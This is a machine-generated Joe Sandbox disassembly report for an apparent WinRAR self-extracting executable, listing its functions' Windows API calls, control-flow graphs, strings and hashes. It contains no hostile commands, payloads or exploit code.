                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              • Opcode ID: a7c7b3baf14e67631b4a23cda0387620aa2debf7ac53bd3ebdd64c2283f13025
                                                              • Instruction ID: 75ee8bee4f37785b70259071c21b5ab8d02ed1954fe84178583aad0c9ed94832
                                                              • Opcode Fuzzy Hash: a7c7b3baf14e67631b4a23cda0387620aa2debf7ac53bd3ebdd64c2283f13025
                                                              • Instruction Fuzzy Hash: 95E1A3715083458FDB24CF28C984B5BBBE5BFCA308F05496DE8899B342D774E945CB92
                                                              Function 009B0900 Relevance: 88.4, APIs: 43, Strings: 7, Instructions: 935windowfilesleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_catch_GS.LIBCMT ref: 009B090A
                                                                • Part of subcall function 00991E44: GetDlgItem.USER32(00000000,00003021), ref: 00991E88
                                                                • Part of subcall function 00991E44: SetWindowTextW.USER32(00000000,009CC6C8), ref: 00991E9E
                                                              • EndDialog.USER32(?,00000000), ref: 009B0A18
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 009B0A57
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009B0A71
                                                              • IsDialogMessageW.USER32(?,?), ref: 009B0A84
                                                              • TranslateMessage.USER32(?), ref: 009B0A92
                                                              • DispatchMessageW.USER32(?), ref: 009B0A9C
                                                              • EndDialog.USER32(?,00000001), ref: 009B0ADE
                                                              • GetDlgItem.USER32(?,00000068), ref: 009B0B04
                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 009B0B1F
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,009CC6C8), ref: 009B0B32
                                                              • SetFocus.USER32(00000000), ref: 009B0B39
                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 009B0C20
                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 009B0C4C
                                                              • GetTickCount.KERNEL32 ref: 009B0C79
                                                              • GetLastError.KERNEL32(?,00000011), ref: 009B0CD5
                                                              • GetCommandLineW.KERNEL32 ref: 009B0DF9
                                                              • _wcslen.LIBCMT ref: 009B0E06
                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,?,winrarsfxmappingfile.tmp,?,009E5430,00000400,00000001,00000001), ref: 009B0E85
                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 009B0EA3
                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 009B0EDC
                                                              • WaitForInputIdle.USER32(?,00002710), ref: 009B0F0B
                                                              • Sleep.KERNEL32(00000064), ref: 009B0F25
                                                              • UnmapViewOfFile.KERNEL32(?,?,?,?,?,?,?,009E5430,00000400), ref: 009B0F61
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,009E5430,00000400), ref: 009B0F6D
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 009B1072
                                                                • Part of subcall function 00991E1F: GetDlgItem.USER32(?,?), ref: 00991E34
                                                                • Part of subcall function 00991E1F: ShowWindow.USER32(00000000), ref: 00991E3B
                                                              • SetDlgItemTextW.USER32(?,00000065,009CC6C8), ref: 009B108A
                                                              • GetDlgItem.USER32(?,00000065), ref: 009B1093
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 009B10A2
                                                              • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_000206D0,00000000,?), ref: 009B1422
                                                              • EndDialog.USER32(?,00000001), ref: 009B1436
                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 009B10B1
                                                                • Part of subcall function 009AE265: __EH_prolog3_GS.LIBCMT ref: 009AE26C
                                                                • Part of subcall function 009AE265: ShowWindow.USER32(?,00000000,00000038), ref: 009AE294
                                                                • Part of subcall function 009AE265: GetWindowRect.USER32(?,?), ref: 009AE2D8
                                                                • Part of subcall function 009AE265: ShowWindow.USER32(?,00000005,?,00000000), ref: 009AE373
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 009B114F
                                                              • SendMessageW.USER32(?,00000080,00000001,000103E5), ref: 009B1284
                                                              • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,17050D3A), ref: 009B129D
                                                              • GetDlgItem.USER32(?,00000068), ref: 009B12A6
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 009B12BE
                                                              • GetDlgItem.USER32(?,00000066), ref: 009B12E6
                                                              • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 009B135D
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 009B1371
                                                              • EnableWindow.USER32(?,00000000), ref: 009B15A7
                                                              • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 009B15E8
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 009B160D
                                                                • Part of subcall function 009B1D4F: __EH_prolog3_GS.LIBCMT ref: 009B1D59
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Item$Message$TextWindow$Send$Dialog$ErrorFileLastShow$H_prolog3_LongView$CloseCommandCountCreateDispatchEnableExecuteFocusH_prolog3_catch_HandleIdleInputLineMappingParamRectShellSleepTickTranslateUnmapWait_wcslen
                                                              • String ID: -el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_$winrarsfxmappingfile.tmp
                                                              • API String ID: 3616063595-3000381960
                                                              • Opcode ID: de78cd75216b4a09bf6ab6fc004e2e4581baea340777d961a679687ebddc0648
                                                              • Instruction ID: 902b9ce58a3bf15d33edb049a3be819409175427b5706c57f5f5d1b341134f63
                                                              • Opcode Fuzzy Hash: de78cd75216b4a09bf6ab6fc004e2e4581baea340777d961a679687ebddc0648
                                                              • Instruction Fuzzy Hash: 5572E770918388EEEF21EBA4CD89FEE7BB9AB41314F404059F105BB1A2D7B45E44DB61
                                                              Function 009A6D7B Relevance: 40.6, APIs: 16, Strings: 7, Instructions: 394libraryfileloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 379 9a6d7b-9a6dd1 call 9b5b20 GetModuleHandleW 382 9a6e28-9a708c 379->382 383 9a6dd3-9a6de3 GetProcAddress 379->383 384 9a719b 382->384 385 9a7092-9a709d call 9be50e 382->385 386 9a6dfd-9a6e0d GetProcAddress 383->386 387 9a6de5-9a6dfb 383->387 389 9a719d-9a71be call 9a13f9 call 9a2117 384->389 385->384 396 9a70a3-9a70b8 call 9a13f9 385->396 386->382 388 9a6e0f-9a6e24 386->388 387->386 388->382 402 9a71c0-9a71cc call 9a067e 389->402 403 9a70ba 396->403 404 9a70bd-9a70d5 CreateFileW 396->404 413 9a71ce-9a71dc call 9a6c5e 402->413 414 9a7203-9a7234 call 9914a7 call 9a229d call 991a66 call 99ed1f 402->414 403->404 406 9a70db-9a70e7 SetFilePointer 404->406 407 9a7186-9a7199 CloseHandle call 991a66 404->407 406->407 408 9a70ed-9a7107 ReadFile 406->408 407->389 408->407 411 9a7109-9a7114 408->411 416 9a711a-9a714d call 9914a7 411->416 417 9a73f2-9a73f7 call 9b5ce1 411->417 413->414 426 9a71de-9a7201 CompareStringW 413->426 443 9a7239-9a723c 414->443 429 9a7161-9a7174 call 9a6366 416->429 426->414 427 9a723e-9a7242 426->427 427->402 431 9a7248 427->431 437 9a714f-9a7156 429->437 438 9a7176-9a7181 call 991a66 * 2 429->438 434 9a724c-9a7250 431->434 439 9a7252 434->439 440 9a7296-9a7298 434->440 441 9a715b-9a715c call 9a6c5e 437->441 442 9a7158 437->442 438->407 447 9a7254-9a728a call 9914a7 call 9a229d call 991a66 call 99ed1f 439->447 444 9a729e-9a72b1 call 9a2187 call 9a067e 440->444 445 9a73bd-9a73ef call 991a66 * 2 call 9b5734 440->445 441->429 442->441 443->427 449 9a724a 443->449 464 9a7332-9a7366 call 9a6a25 AllocConsole 444->464 465 9a72b3-9a7330 call 9a6c5e * 2 call 9a4318 call 9a6a25 call 9a4318 call 9914a7 call 9aecf5 call 991549 444->465 481 9a728c-9a7290 447->481 482 9a7294 447->482 449->434 476 9a7368-9a73a7 GetCurrentProcessId AttachConsole call 9a7441 call 9a7436 GetStdHandle WriteConsoleW Sleep FreeConsole 464->476 477 9a73ad 464->477 483 9a73b0-9a73b7 call 991549 ExitProcess 465->483 476->477 477->483 481->447 486 9a7292 481->486 482->440 486->440
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32,1AC349C0), ref: 009A6DC7
                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 009A6DD9
                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 009A6E03
                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009A70CA
                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 009A70DF
                                                              • ReadFile.KERNEL32(00000000,?,00007FFE,?,00000000), ref: 009A70FF
                                                              • CloseHandle.KERNEL32(00000000), ref: 009A7187
                                                              • CompareStringW.KERNEL32(00000400,00001001,?,000000FF,DXGIDebug.dll,000000FF,?,?,?), ref: 009A71F8
                                                              • AllocConsole.KERNEL32 ref: 009A735E
                                                              • GetCurrentProcessId.KERNEL32 ref: 009A7368
                                                              • AttachConsole.KERNEL32(00000000), ref: 009A736F
                                                              • GetStdHandle.KERNEL32(000000F4,00000000,00000000,?,00000000), ref: 009A738F
                                                              • WriteConsoleW.KERNEL32(00000000), ref: 009A7396
                                                              • Sleep.KERNEL32(00002710), ref: 009A73A1
                                                              • FreeConsole.KERNEL32 ref: 009A73A7
                                                              • ExitProcess.KERNEL32 ref: 009A73B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentExitFreeModulePointerReadSleepStringWrite
                                                              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                              • API String ID: 2644799563-3298887752
                                                              • Opcode ID: 62f97856180036d8214294bd5d6f068e70282c45de18459213bc96dfdf49d280
                                                              • Instruction ID: cfec5d590621df68f3fc7a7e7912b1aa6eca2f8e6e231d6c8faaa5012297ddc5
                                                              • Opcode Fuzzy Hash: 62f97856180036d8214294bd5d6f068e70282c45de18459213bc96dfdf49d280
                                                              • Instruction Fuzzy Hash: 2EF17AB18053889BCF34DFA4CC49FDE7BA9BB46308F40412DF9199B291DB709649CB92
                                                              Function 009B3572 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 106windowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 009B0678: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 009B0689
                                                                • Part of subcall function 009B0678: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009B069A
                                                                • Part of subcall function 009B0678: IsDialogMessageW.USER32(000103EA,?), ref: 009B06AE
                                                                • Part of subcall function 009B0678: TranslateMessage.USER32(?), ref: 009B06BC
                                                                • Part of subcall function 009B0678: DispatchMessageW.USER32(?), ref: 009B06C6
                                                              • GetDlgItem.USER32(00000068,00000000), ref: 009B3595
                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,009AFD20,00000001,?,?), ref: 009B35BA
                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 009B35C9
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,009CC6C8), ref: 009B35D7
                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 009B35F1
                                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 009B360B
                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 009B364F
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 009B3662
                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 009B3675
                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 009B369C
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,009CC860), ref: 009B36AB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                              • String ID: \
                                                              • API String ID: 3569833718-2967466578
                                                              • Opcode ID: d529a614405dd6d726a8d1a9b2be50c77339158356d813e77b30481efa15a931
                                                              • Instruction ID: 51de9e35388f853e9cbac8a427fb5bb215a9871a2a2f10862faf7a34b054c46c
                                                              • Opcode Fuzzy Hash: d529a614405dd6d726a8d1a9b2be50c77339158356d813e77b30481efa15a931
                                                              • Instruction Fuzzy Hash: B231D07125D780BFE310DF20DD89FABBBECEB86715F000519F9519A2A0DB609D058BA7
                                                              Function 009B38A0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 291windowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 632 9b38a0-9b38bc call 9b57d8 635 9b38c2-9b38c8 632->635 636 9b3bc7-9b3bd4 call 991a66 call 9b5787 632->636 635->636 637 9b38ce-9b38f4 call 9b71f0 635->637 644 9b38fd-9b3909 637->644 645 9b38f6 637->645 646 9b390b 644->646 647 9b390d-9b3916 644->647 645->644 646->647 648 9b3918-9b391b 647->648 649 9b3924-9b3927 647->649 650 9b391f-9b3922 648->650 651 9b391d 648->651 652 9b392b-9b3935 649->652 653 9b3929 649->653 650->652 651->650 654 9b393b-9b3948 652->654 655 9b39ce 652->655 653->652 656 9b394a 654->656 657 9b394c-9b3956 654->657 658 9b39d1-9b39d3 655->658 656->657 659 9b3958 657->659 660 9b398c-9b3999 657->660 661 9b39dc-9b39de 658->661 662 9b39d5-9b39da 658->662 665 9b396f-9b3972 659->665 663 9b399b 660->663 664 9b399d-9b39a7 660->664 666 9b39ff-9b3a11 call 9a1383 661->666 667 9b39e0-9b39e7 661->667 662->661 662->666 663->664 670 9b39ad-9b39b2 664->670 671 9b3bd7-9b3bdd 664->671 672 9b395a-9b395f 665->672 673 9b3974 665->673 685 9b3a29-9b3a64 call 9914a7 call 99ed0d call 991a66 666->685 686 9b3a13-9b3a20 call 9a8da4 666->686 667->666 668 9b39e9-9b39f5 667->668 674 9b39fc 668->674 675 9b39f7 668->675 679 9b39b6-9b39bc 670->679 680 9b39b4 670->680 676 9b3bdf 671->676 677 9b3be1-9b3be8 671->677 681 9b3963-9b396d 672->681 682 9b3961 672->682 673->660 674->666 675->674 676->677 683 9b3bea-9b3bf0 677->683 684 9b3c00-9b3c06 677->684 679->671 687 9b39c2-9b39c5 679->687 680->679 681->665 688 9b3976-9b397b 681->688 682->681 691 9b3bf2 683->691 692 9b3bf4-9b3bfd 683->692 694 9b3c0a-9b3c14 684->694 695 9b3c08 684->695 705 9b3a9d-9b3aac ShellExecuteExW 685->705 706 9b3a66-9b3a95 call 9914a7 call 9a0e49 call 991a66 685->706 686->685 700 9b3a22 686->700 687->654 696 9b39cb 687->696 689 9b397f-9b3989 688->689 690 9b397d 688->690 689->660 690->689 691->692 692->684 694->658 695->694 696->655 700->685 708 9b3b7c-9b3b82 705->708 709 9b3ab2-9b3abc 705->709 740 9b3a9a 706->740 741 9b3a97 706->741 711 9b3bb7-9b3bc3 708->711 712 9b3b84-9b3b99 708->712 713 9b3aca-9b3acc 709->713 714 9b3abe-9b3ac0 709->714 711->636 716 9b3b9b-9b3bab call 9919a9 712->716 717 9b3bae-9b3bb6 call 9b5726 712->717 719 9b3ace-9b3ad7 IsWindowVisible 713->719 720 9b3ae5-9b3af6 WaitForInputIdle call 9b3fcf 713->720 714->713 718 9b3ac2-9b3ac8 714->718 716->717 717->711 718->713 726 9b3b30-9b3b3b CloseHandle 718->726 719->720 721 9b3ad9-9b3ae3 ShowWindow 719->721 727 9b3afb-9b3b02 720->727 721->720 730 9b3b3d-9b3b4a call 9a8da4 726->730 731 9b3b4c-9b3b53 726->731 727->726 733 9b3b04-9b3b06 727->733 730->731 736 9b3b6b-9b3b6d 730->736 731->736 737 9b3b55-9b3b57 731->737 733->726 739 9b3b08-9b3b17 GetExitCodeProcess 733->739 736->708 738 9b3b6f-9b3b71 736->738 737->736 743 9b3b59-9b3b5f 737->743 738->708 745 9b3b73-9b3b76 ShowWindow 738->745 739->726 746 9b3b19-9b3b22 739->746 740->705 741->740 743->736 744 9b3b61 743->744 744->736 745->708 747 9b3b29 746->747 748 9b3b24 746->748 747->726 748->747
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 009B38A7
                                                              • ShellExecuteExW.SHELL32(?), ref: 009B3AA4
                                                              • IsWindowVisible.USER32(?), ref: 009B3ACF
                                                              • ShowWindow.USER32(?,00000000), ref: 009B3ADD
                                                              • WaitForInputIdle.USER32(?,000007D0), ref: 009B3AED
                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 009B3B0F
                                                              • CloseHandle.KERNEL32(?), ref: 009B3B33
                                                              • ShowWindow.USER32(?,00000001), ref: 009B3B76
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Window$Show$CloseCodeExecuteExitH_prolog3_HandleIdleInputProcessShellVisibleWait
                                                              • String ID: .exe$.inf
                                                              • API String ID: 3208621885-3750412487
                                                              • Opcode ID: 6bcd1863959d80d192c3658eb6de5dd658fadf1d6294c9aa64dad89819a81ed3
                                                              • Instruction ID: 356450b68ffd82cf5260dc2f5c5c35fde3a2530bef409ebc1d823a3cdbd16f63
                                                              • Opcode Fuzzy Hash: 6bcd1863959d80d192c3658eb6de5dd658fadf1d6294c9aa64dad89819a81ed3
                                                              • Instruction Fuzzy Hash: 2BB1AD31A14259DFCF21DFA8CA857EDB7B9BF84320F24C119E844AB295DB70AE45CB50
                                                              Function 009B3EFC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1052 9b3efc-9b3f11 call 9b57d8 1055 9b3f13 1052->1055 1056 9b3f15-9b3f45 SetEnvironmentVariableW call 9a6366 1052->1056 1055->1056 1058 9b3f4a-9b3f4c 1056->1058 1059 9b3f4e 1058->1059 1060 9b3f8c-9b3f92 1058->1060 1063 9b3f51-9b3f57 1059->1063 1061 9b3fc7-9b3fcc call 9b5787 1060->1061 1062 9b3f94-9b3fa9 1060->1062 1064 9b3fab-9b3fbb call 9919a9 1062->1064 1065 9b3fbe-9b3fc6 call 9b5726 1062->1065 1066 9b3f5b-9b3f67 call 9a6624 1063->1066 1067 9b3f59 1063->1067 1064->1065 1065->1061 1076 9b3f69-9b3f70 1066->1076 1077 9b3f72-9b3f76 1066->1077 1067->1066 1076->1063 1078 9b3f7a-9b3f86 SetEnvironmentVariableW 1077->1078 1079 9b3f78 1077->1079 1078->1060 1079->1078
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 009B3F03
                                                              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?,?,?,?,?,?,00000028), ref: 009B3F1B
                                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,?,?,?,?,?,?,?,00000028), ref: 009B3F86
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentVariable$H_prolog3_
                                                              • String ID: sfxcmd$sfxpar
                                                              • API String ID: 3605364767-3493335439
                                                              • Opcode ID: c2249795399267ee5b8da8ffa5525ad834fe39872b9749c8f3699ea103da0032
                                                              • Instruction ID: ce5eac1997225632cb9a78de0a16b521f40929c0098670d43529ea4238c46cf6
                                                              • Opcode Fuzzy Hash: c2249795399267ee5b8da8ffa5525ad834fe39872b9749c8f3699ea103da0032
                                                              • Instruction Fuzzy Hash: F5212470D10209DBDF18DFA8EA84AEDBBF9EB49350B50841AF446A7250DB30AA44CF65
                                                              Function 0099E180 Relevance: 7.7, APIs: 5, Instructions: 183filetimeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1080 99e180-99e1c9 1081 99e1cb-99e1ce 1080->1081 1082 99e1d4 1080->1082 1081->1082 1083 99e1d0-99e1d2 1081->1083 1084 99e1d6-99e1e6 1082->1084 1083->1084 1085 99e1e8 1084->1085 1086 99e1ee-99e1f8 1084->1086 1085->1086 1087 99e1fa 1086->1087 1088 99e1fd-99e22a 1086->1088 1087->1088 1089 99e22c 1088->1089 1090 99e232-99e238 1088->1090 1089->1090 1091 99e23a 1090->1091 1092 99e23c-99e254 CreateFileW 1090->1092 1091->1092 1093 99e25a-99e28a GetLastError call 9a169a 1092->1093 1094 99e316 1092->1094 1100 99e28c-99e293 1093->1100 1101 99e2be 1093->1101 1096 99e319-99e31c 1094->1096 1098 99e32a-99e32e 1096->1098 1099 99e31e-99e321 1096->1099 1103 99e34f-99e360 1098->1103 1104 99e330-99e333 1098->1104 1099->1098 1102 99e323 1099->1102 1105 99e298-99e2b8 CreateFileW GetLastError 1100->1105 1106 99e295 1100->1106 1108 99e2c1-99e2cb 1101->1108 1102->1098 1109 99e362-99e370 call 9925c3 1103->1109 1110 99e374-99e39a call 991a66 call 9b5734 1103->1110 1104->1103 1107 99e335-99e34c SetFileTime 1104->1107 1105->1101 1111 99e2ba-99e2bc 1105->1111 1106->1105 1107->1103 1112 99e2cd-99e2e2 1108->1112 1113 99e300-99e314 1108->1113 1109->1110 1111->1108 1117 99e2e4-99e2f4 call 9919a9 1112->1117 1118 99e2f7-99e2ff call 9b5726 1112->1118 1113->1096 1117->1118 1118->1113
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,00000001,00000000,00000000,00000003,08000000,00000000,1AC349C0,?,?,00000000,?,?,00000000,009C9E6B,000000FF), ref: 0099E248
                                                              • GetLastError.KERNEL32(?,?,00000000,009C9E6B,000000FF,?,00000011,?,?,00000000,?,?,?,?,?,?), ref: 0099E25A
                                                              • CreateFileW.KERNEL32(?,00000001,00000000,00000000,00000003,08000000,00000000,?,?,?,?,00000000,009C9E6B,000000FF,?,00000011), ref: 0099E2A6
                                                              • GetLastError.KERNEL32(?,?,00000000,009C9E6B,000000FF,?,00000011,?,?,00000000,?,?,?,?,?,?), ref: 0099E2AF
                                                              • SetFileTime.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,009C9E6B,000000FF,?,00000011,?,?,00000000,?,?), ref: 0099E346
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: File$CreateErrorLast$Time
                                                              • String ID:
                                                              • API String ID: 1999340476-0
                                                              • Opcode ID: 83375201239fc8136460a63aca2c070ed0733cf05d7f90881aeffbaf79fd0e9a
                                                              • Instruction ID: 4afe2aff3a2a15c447f8371517e6f810b697d00ef061c9e06f7fe8b928bf2f0a
                                                              • Opcode Fuzzy Hash: 83375201239fc8136460a63aca2c070ed0733cf05d7f90881aeffbaf79fd0e9a
                                                              • Instruction Fuzzy Hash: D0617F71D14249DFDF24CF68D986BEE7BA8FF08314F204619F82597281D774A944CB94
                                                              Function 009A74EC Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1126 9a74ec-9a7536 call 9a77cf ReleaseSemaphore 1129 9a7538 1126->1129 1130 9a7556-9a758a DeleteCriticalSection CloseHandle * 2 1126->1130 1131 9a753b-9a7554 call 9a75ed CloseHandle 1129->1131 1131->1130
                                                              APIs
                                                                • Part of subcall function 009A77CF: ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,00000004,009973B8), ref: 009A77E1
                                                                • Part of subcall function 009A77CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00000004,009973B8), ref: 009A77F5
